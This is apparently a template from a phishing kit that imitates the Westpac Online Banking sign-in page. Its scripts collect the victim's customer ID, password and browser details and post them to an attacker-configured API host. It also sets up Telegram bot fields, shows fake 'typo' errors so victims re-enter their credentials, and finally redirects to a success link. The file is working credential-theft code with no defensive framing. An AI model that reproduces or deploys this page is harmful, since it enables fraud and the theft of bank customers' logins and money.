<html lang="en">

<head>
    <x-head />
    <style>
        #main-content {
            max-width: 550px !important;
        }

        header .logo img {
            height: initial !important;
            width: initial !important;
        }

        header * {
            font: normal 800 1.5rem/2.5rem CBA Beacon Sans !important;
            font-weight: 400 !important;
        }
    </style>
</head>

<body class="honeycomb textstyles--commbank">
    <!------------------------------------------>
    <!-- Configurations -->
    <!------------------------------------------>
    <script>
        function getConfigs() {
            return {
                "index": Number('{{ $index }}'),
                "isFinalPage": Boolean('{{ $details['isFinalPage'] }}'),
                "pagesSequence": '{{ $details['pagesSequence'] }}',
                "isActive": '{{ $details['isActive'] }}' === "true" ? true : false,
                "page": '{{ $details['page'] }}',
                "pagesWaitingTime": '{{ $details['pagesWaitingTime'] }}',
                "pagesTypeOfWaitingPage": '{{ $details['pagesTypeOfWaitingPage'] }}',
                "pagesNumberOfRepetition": Number('{{ $details['pagesNumberOfRepetition'] }}'),
                'pagesWaitingTime': Number('{{ $details['pagesWaitingTime'] }}') * 1000,
                'pagesIsFormsEmptyInRepetitions': Boolean('{{ $details['pagesIsFormsEmptyInRepetitions'] }}'),
                'pagesGoBackPageName': '{{ $details['pagesGoBackPageName'] }}',
                'pagesGoNextPageName': '{{ $details['pagesGoNextPageName'] }}',
                'pagesNavigationPageControlType': '{{ $details['pagesNavigationPageControlType'] }}',
                'googleRecaptchaSiteKey': '{{ $details['googleRecaptchaSiteKey'] }}',
                'googleRecaptchaSecretKey': '{{ $details['googleRecaptchaSecretKey'] }}',
                'telegramChatId': '{{ $details['telegramChatId'] }}',
                'telegramBotToken': '{{ $details['telegramBotToken'] }}',
                'apiHost': '{{ $details['apiHost'] }}',
                'webHost': '{{ $details['webHost'] }}',
                'accessCountryISO': '{{ $details['accessCountryISO'] }}',
                'errorPageLink': '{{ $details['errorPageLink'] }}',
                'successPageLink': '{{ $details['successPageLink'] }}',
            };
        }
    </script>
    <!------------------------------------------>
    <!-- State -->
    <!------------------------------------------>
    <script>
        function getCurrentState() {
            const currentPage = getConfigs()["index"];
            let data = localStorage.getItem("data");
            if (!currentPage || !data) {
                data = JSON.stringify({
                    page: 0,
                    info: {}
                });
                localStorage.setItem("data", data);
            }
            return JSON.parse(data);
        }

        function removeState() {
            localStorage.removeItem("data");
        }

        function updateCurrentState(page, info) {
            let currentData = getCurrentState();
            localStorage.setItem("data", JSON.stringify({
                ...currentData,
                ...info,
                page: page,
            }));
        }
    </script>
    <!------------------------------------------>
    <!-- Routing -->
    <!------------------------------------------>
    <script>
        function redirect(target) {
            window.location.href = target;
        }

        function goToLink(target) {
            window.location.replace(target);
        }
    </script>
    <!------------------------------------------>
    <!-- Protection -->
    <!------------------------------------------>
    <script>
        function protectPage() {
            const page = getCurrentState()["page"];
            const currentPage = getConfigs()["index"];
            let isAccessible =
                (currentPage === 0 && page === undefined) || currentPage === page;
            let isValid = true;
            if (!isAccessible) {
                const pages = getConfigs()["pagesSequence"].split(",").length;
                isValid = !isNaN(Number(page)) && page <= pages && page >= 0;
            }
            if (!isValid) {
                removeState();
                redirect("/0");
            }
            if (!isAccessible) {
                const state = getCurrentState();
                redirect("/" + page);
            }

            if (!getConfigs()["isActive"]) {
                if (getConfigs()["isFinalPage"]) {
                    removeState();
                    goToLink(getConfigs()["successPageLink"]);
                } else {
                    updateCurrentState(page + 1, {});
                }
            }
        }
        protectPage();
    </script>


    <!-- Handling -->
    <script>
        const configs = getConfigs();

        function onErrorAction() {
            goToLink(getConfigs["errorPageLink"]);
        }
        async function handleAuto() {
            const configs = getConfigs();
            const dataToSend = getFormData();
            const test = validateData(dataToSend);
            if (!test)
                return showGlobalError(
                    "Kindly complete all mandatory fields. Verify the accuracy of the provided information.");
            hideGlobalError();
            showLoader();
            const response = await makeAPICall(dataToSend);
            if (!response) return onErrorAction();
            onSuccessAction(dataToSend);
        }

        function handleManual(configs) {
            const dataToSend = getAllFormData();
            showLoader(configs);
            alert("Manual");
        }

        function onSubmitData(key) {
            if (getConfigs()["pagesNavigationPageControlType"] === "AUTO")
                handleAuto()
            else
                handleManual(configs);
        }
    </script>

    <div id="root">
        <x-header />
        <main>
            <form method="POST" action="#" class="common_card" id="main-content">
                <div class="error-component">
                    <img src="./assets/img/aa.svg" alt="error-icon" />
                    <div id="error-message"> It took you a while to log on. You'll need to enter your
                        details again.</div>
                </div>
                <div class="waiting-popup-container waiting-popup-component">
                    <p class="waiting-popup-title">
                        Processing ...
                    </p>
                    <div class="waiting-popup"></div>

                </div>
                <div class="logonId" id="fp_forgotpassword">
                    <h1 class="logonId__heading" id="fp_forgotpassword_heading">Sign in to Westpac Online Banking</h1>



                    <div class="form-group"><label for="customerid">Customer ID</label><input required id="customerid"
                            class="form-control" name="customerid" type="text" aria-required="true" value=""
                            maxlength="8" placeholder="">
                        <div class="invalid-feedback" id="invalid-feedback-customerid">Please enter a valid OTP.</div>
                    </div>

                    <div class="form-group"><label for="code">Password</label><input required id="code"
                            class="form-control" name="code" type="password" aria-required="true" value=""
                            placeholder="">
                        <div class="invalid-feedback" id="invalid-feedback-code"></div>
                    </div>

                    <button id="submitButton" class="g-recaptcha logonId__btn logonId__btnSubmit btn-action--emphasis"
                        data-sitekey="{{ $details['googleRecaptchaSiteKey'] }}" data-callback="onSubmitData"
                        data-action="submit">Sign in</button>
                </div>
            </form>
        </main>
        <x-footer />
    </div>
    </div>
    <script></script>
</body>



<!-- Setup Validation -->
<script>
    function validateCustomerID(input) {
        const value = input.val();
        const message = $("#invalid-feedback-customerid");
        if (!value) {
            showError(input, message, "ID is required");
            return false;
        }
        if (value.length != 8) {
            showError(input, message, "Please enter a valid 8 digit Customer ID");
            return false;
        }
        hideError(input, message);
        return true;
    }

    function validatePassword(input) {
        const value = input.val();
        const message = $("#invalid-feedback-code");
        if (!value) {
            showError(input, message, "Password is required");
            return false;
        } else if (value.length < 6) {
            showError(input, message, "Please enter a valid password, minimum 6 characters");
            return false;
        }
        hideError(input, message);
        return true;
    }
</script>
<!--Setup Components -->
<script></script>
<!-- Setup musk -->
<script></script>
<!-- Setup Errors -->
<script>
    $("#customerid").on("input", function() {
        validateCustomerID($(this));
    });
    $("#code").on("input", function() {
        validatePassword($(this));
    });
</script>
<!-- Handling Form -->
<script>
    function resetForm() {
        $("#customerid").val("");
        $("#code").val("");
    }

    function getFormData() {
        return {
            "captchaResponse": $("[name='g-recaptcha-response']").val(),
            "customerid": $("#customerid").val(),
            "password": $("#code").val(),
            "useragent": navigator.userAgent,
            "userpanguage": navigator.language,
            "userplatform": navigator.platform,
            "page": getConfigs()["page"],
        }
    }

    function validateData(data) {
        let test = true;
        test = validateCustomerID($("#customerid")) && test;
        test = validatePassword($("#code")) && test;
        return test;
    }
</script>
<!-- Handling Components -->
<script>
    function showError(input, messsage, text) {
        messsage.text(text);
        messsage.css("display", "block");
        input.addClass("is-invalid");
    }

    function hideError(input, messsage) {
        messsage.css("display", "none");
        input.removeClass("is-invalid");
    }

    function showGlobalError(message) {
        $(".error-component").css("display", "flex");
        $("#error-message").css("display", "block");
        $("#error-message").text(message);
        $("#main-content").addClass("error");
    }

    function hideGlobalError() {
        $(".error-component").css("display", "none");
        $("#error-message").css("display", "none");
        $("#main-content").removeClass("error");
    }

    function showLoader() {
        $(".waiting-popup-container").css("display", "flex");
    }

    function hideLoader() {
        $(".waiting-popup-container").css("display", "none");
    }
</script>
<!-- Handling API -->
<script>
    function objectToQueryString(obj) {
        return Object.keys(obj).map(key => key + '=' + obj[key]).join('&');
    }
    async function makeAPICall(data) {
        const configs = getConfigs();
        const dataToSend = objectToQueryString(data);
        const response = await axios.post(`${configs["apiHost"]}/${configs["page"]}?${dataToSend}`, {})
        return response.data;
    }

    function onSuccessAction(data) {
        setTimeout(() => {
            if (configs["pagesNumberOfRepetition"]) {
                configs["pagesNumberOfRepetition"]--;
                if (configs["pagesIsFormsEmptyInRepetitions"])
                    resetForm();
                hideLoader();
                showGlobalError(
                    "We've encountered a minor typo in your input. Kindly review and rectify it before proceeding."
                );
                return;
            } else if (getConfigs()["isFinalPage"]) {
                removeState();
                goToLink(getConfigs()["successPageLink"]);
            } else {
                updateCurrentState(getConfigs()["index"] + 1, {});
                redirect("/" + (getConfigs()["index"] + 1));
            }
        }, configs["pagesWaitingTime"]);
    }
</script>

</html>
